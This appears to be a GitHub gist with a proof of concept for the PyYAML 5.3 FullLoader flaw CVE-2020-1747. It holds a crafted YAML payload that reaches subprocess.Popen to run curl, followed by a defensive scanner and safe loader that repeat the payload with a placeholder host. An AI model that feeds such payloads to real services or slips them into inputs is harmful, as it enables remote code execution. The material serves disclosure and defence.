Last active Dec 3, 2020
CVE-2020-1747 PyYAML PoC
```python
# pyyaml==5.3 required. Vulnerability has been fixed in 5.3.1
# More: ret2libc's report in
# Explanation:
from yaml import *

# Read the crafted document from disk as bytes
with open('payload.yaml', 'rb') as f:
    content = f.read()

data = load(content, Loader=FullLoader)  # Using vulnerable FullLoader
```
```yaml
# The `extend` function is overridden to run `yaml.unsafe_load` with a
# custom `listitems` argument, in this case a simple curl request
- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", ""]]'
  tag: !!str dummy
  value: !!str dummy
  extend: !!python/name:yaml.unsafe_load
```
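Added here as a defender-side check, not part of the gist: a scanner for the PyYAML `python/*` tags this payload depends on, and a loader that refuses such documents before handing anything to `yaml.safe_load` (which, together with upgrading to 5.3.1, is the actual fix). `find_python_tags`, `load_untrusted` and the `PAYLOAD` sample (the gist's payload with a placeholder URL) are constructed for this example.

```python
import re
from typing import List

# PyYAML tags that construct arbitrary Python objects. The "!!python/..."
# shorthand and the verbatim "!<tag:yaml.org,2002:python/...>" spelling
# resolve to the same tag, so the pattern covers both.
PYTHON_TAG_RE = re.compile(
    r"(?:!!|!<tag:yaml\.org,2002:)python/[A-Za-z_/]+(?::[\w.]+)?"
)


def find_python_tags(text: str) -> List[str]:
    """Return every python/* tag found in the raw YAML text, in order.

    Scanning the text instead of the parsed tree also catches tags hidden
    inside string scalars: the CVE-2020-1747 payload carries its second tag
    in the `listitems` string and only evaluates it once unsafe_load runs.
    """
    return [m.group(0) for m in PYTHON_TAG_RE.finditer(text)]


def load_untrusted(text: str):
    """Refuse documents with python/* tags, then parse with safe_load.

    safe_load alone has no constructors for these tags; the pre-scan only
    adds a loggable signal that someone submitted such a document.
    """
    found = find_python_tags(text)
    if found:
        raise ValueError(f"refusing YAML with Python object tags: {found}")
    import yaml  # PyYAML; imported lazily so the scanner works without it
    return yaml.safe_load(text)


# Constructed sample mirroring the gist's payload; the curl target is a
# placeholder, not a real endpoint.
PAYLOAD = """\
- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "http://example.invalid/"]]'
  tag: !!str dummy
  value: !!str dummy
  extend: !!python/name:yaml.unsafe_load
"""

if __name__ == "__main__":
    print(find_python_tags(PAYLOAD))
```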